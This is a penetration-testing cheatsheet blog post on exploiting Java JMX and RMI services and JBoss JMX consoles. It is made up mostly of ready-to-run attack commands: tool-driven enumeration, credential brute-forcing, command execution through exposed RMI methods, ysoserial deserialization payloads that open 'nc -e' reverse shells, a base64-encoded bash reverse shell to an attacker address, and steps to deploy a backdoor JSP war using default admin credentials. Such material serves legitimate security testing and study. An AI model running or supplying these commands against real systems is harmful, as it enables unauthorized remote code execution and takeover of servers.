Java JMX RMI Pentest Cheatsheet


RMI can be run on any nonstandard port and when RMI is running you will observer one more endpoint port connected to it (find it from nmap easily by running rmi-dumpregistry ) 

Java Management Extensions (JMX) and Remote Method Invocation (RMI) play crucial roles in the management and monitoring of Java applications. They allow developers and administrators to interact with applications remotely, providing a powerful interface for managing resources. However, this also opens up potential vulnerabilities that can be exploited if not properly secured. This cheatsheet is designed for penetration testers and security professionals looking to understand and exploit weaknesses in Java JMX RMI implementations effectively.

#jmxrmi  bound name and its signatures might be vulnerable to MLetMbean Vuln, where MBean that can be used for loading additional MBeans over the network.
java.lang.String getVersion() newClient(java.lang.Object arg)
Java RMI Registry - Port 1616

nmap -Pn -sS -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p 1616

What is Java RMI?

The Java Remote Method Invocation (RMI) system allows an object running in one Java virtual machine to invoke methods on an object running in another Java virtual machine. RMI provides for remote communication between programs written in the Java programming language. When developers want to make their Java objects available within the network, they usually bind them to an RMI registry. The registry stores all information required to connect to the object (IP address, listening port, implemented class or interface and the ObjID value) and makes it available under a human readable name (the bound name). Clients that want to consume the RMI service ask the RMI registry for the corresponding bound name and the registry returns all required information to connect. Thus, the situation is basically the same as with an ordinary DNS service.

What is Apache Tomcat?

Apache Tomcat is a free and open-source implementation of the Jakarta Servlet, Jakarta Expression Language, and WebSocket technologies. It provides a "pure Java" HTTP web server environment in which Java code can run.

What is JBoss application server?

JBoss application server is an open-source platform, developed by Red Hat, used for implementing Java applications and a wide variety of other software applications. You can build and deploy Java services to be scaled to fit the size of your business.

What is JMX?

Java Management Extensions (JMX) is a Java technology that supplies tools for managing and monitoring applications, system objects, devices (such as printers) and service-oriented networks. Those resources are represented by objects called MBeans (for Managed Bean). Using the JMX console, we can manage the application and, therefore, alter it to execute malicious code on the target server and gain remote code execution.

What is an MBean?

An MBean is a managed Java object, similar to a JavaBeans component, that follows the design patterns set forth in the JMX specification. An MBean can represent a device, an application, or any resource that needs to be managed.


#Download the package from releases java -jar BaRMIe.jar -enum 5000 java -jar BaRMIe.jar -attack 5000

Remote Method Guesser java -jar rmg-3.0.0-jar-with-dependencies.jar 5000 enum #Look for Vulnerabilities java -jar rmg.jar enum 5000 #Get bound names/Brute Force & available method signatures java -jar rmg.jar guess 1099 Output: CustomRMIServer ] HIT! Method with signature String runCommand(Strin #Exploiting the Available Method java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' # By Default, Remote Method Guesser does not display the function/command output, we need to use remote plugins to get the output # Function name/ Bound name = CustomRMIServer; Followed by the signare found by guesser # Let's use Time module and sleep command to find out if we are able to execute the commands or not time java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"sleep", "5"}' --signature 'String runCommand(String[] args)' # If the Sleep is successful, then time for command execution using RMG plugins -GenericPrint.jar java -jar rmg.jar call 1099 --bound-name CustomRMIServer 'new String[] {"ls", "-al"}' --signature 'String runCommand(String[] args)' --plugin plugins/GenericPrint.jar # Gaining Reverse Shell echo '/bin/bash -c "bash -i >& /dev/tcp/ 0>&1"' | base64 -w0;echo java -jar rmg.jar call 1099 'new String[] {"/bin/bash", "-c", "echo L2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjEwLjEvNDQzIDA+JjEiCg==| base64 -d | bash"}' --signature 'String runCommand(String[] args)' --bound-name CustomRMIServer --plugin plugins/GenericPrint.jar #Command Exec - Example java -jar rmg.jar call 5000 "wget Attacker_IP:8000/worked" --signature 'String execute(String cmd)' --bound-name jmxrmi #Exploit CVE-2019-2684; Try to bind client locally; doesnt work for JMX RMI java -jar rmg.jar bind 5000 my-object --localhost-bypass


#Good for JMX Severs Source - #Download package from repo #Check for auth and possible attr #If auth is enabled; cannot go further. java -jar beanshooter.jar info 5000 #Enum - Check for vulns (Auth and Pre-auth Deserialization) java -jar beanshooter.jar enum 5000 #Bruteforce creds java -jar beanshooter.jar brute 5000 --username-file /usr/share/wordlists/user.txt --password-file /usr/share/wordlists/pass.txt #You might require ysoserial.jar, download and copy it to /opt/yso.jar or add an arg "--yso /opt/yso.jar" #Get a REVERSE SHELL; java -jar beanshooter.jar serial 5000 CommonsCollections6 "nc 443 -e ash" --username admin --password admin #Add --preauth if pre-auth deserialization is enabled java -jar beanshooter.jar serial 5000 --preauth CommonsCollections6 "nc 443 -e ash" #If SSL is enabled java -jar beanshooter.jar enum --ssl 5000 #If Remote MBean server Does not require auth #This might require tonka; you can find it in beanshooter repo;


#Download the package git clone #Bruteforce java -jar rmiscout.jar bruteforce -i lists/methods.txt -r void,boolean,long -p String,int -l 1,4 <host> <port> #Wordlist java -jar wordlist -i lists/prototypes.txt <host> <port>

Attacking JBOSS JMX Management

default username/password is admin:admin - Under 'JMX Agent View' page, you can search for any JBOSS API - search for 'jboss.system*' to Search for the MainDeployer (JBoss System API). - The MainDeployer service can be used to manage deployments on the JBoss application server. - Scroll down to the redeploy attribute. Make sure the redeploy attribute accepts a URL as the input ( - Use the backdoor JSP Payload from - - Create a war file using `jar -cvf cmd.war cmd.jsp` - Set it on a python HTTP Server and make sure its accessible from JBOSS Server , we can invoke a war file from a url and install it - Under MainDeployer, Head over to the JMX Console page and under the redeploy attribute --> --> paste the cmd.war file url and hit "Deploy" - now head over to '' for GET command Execution

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment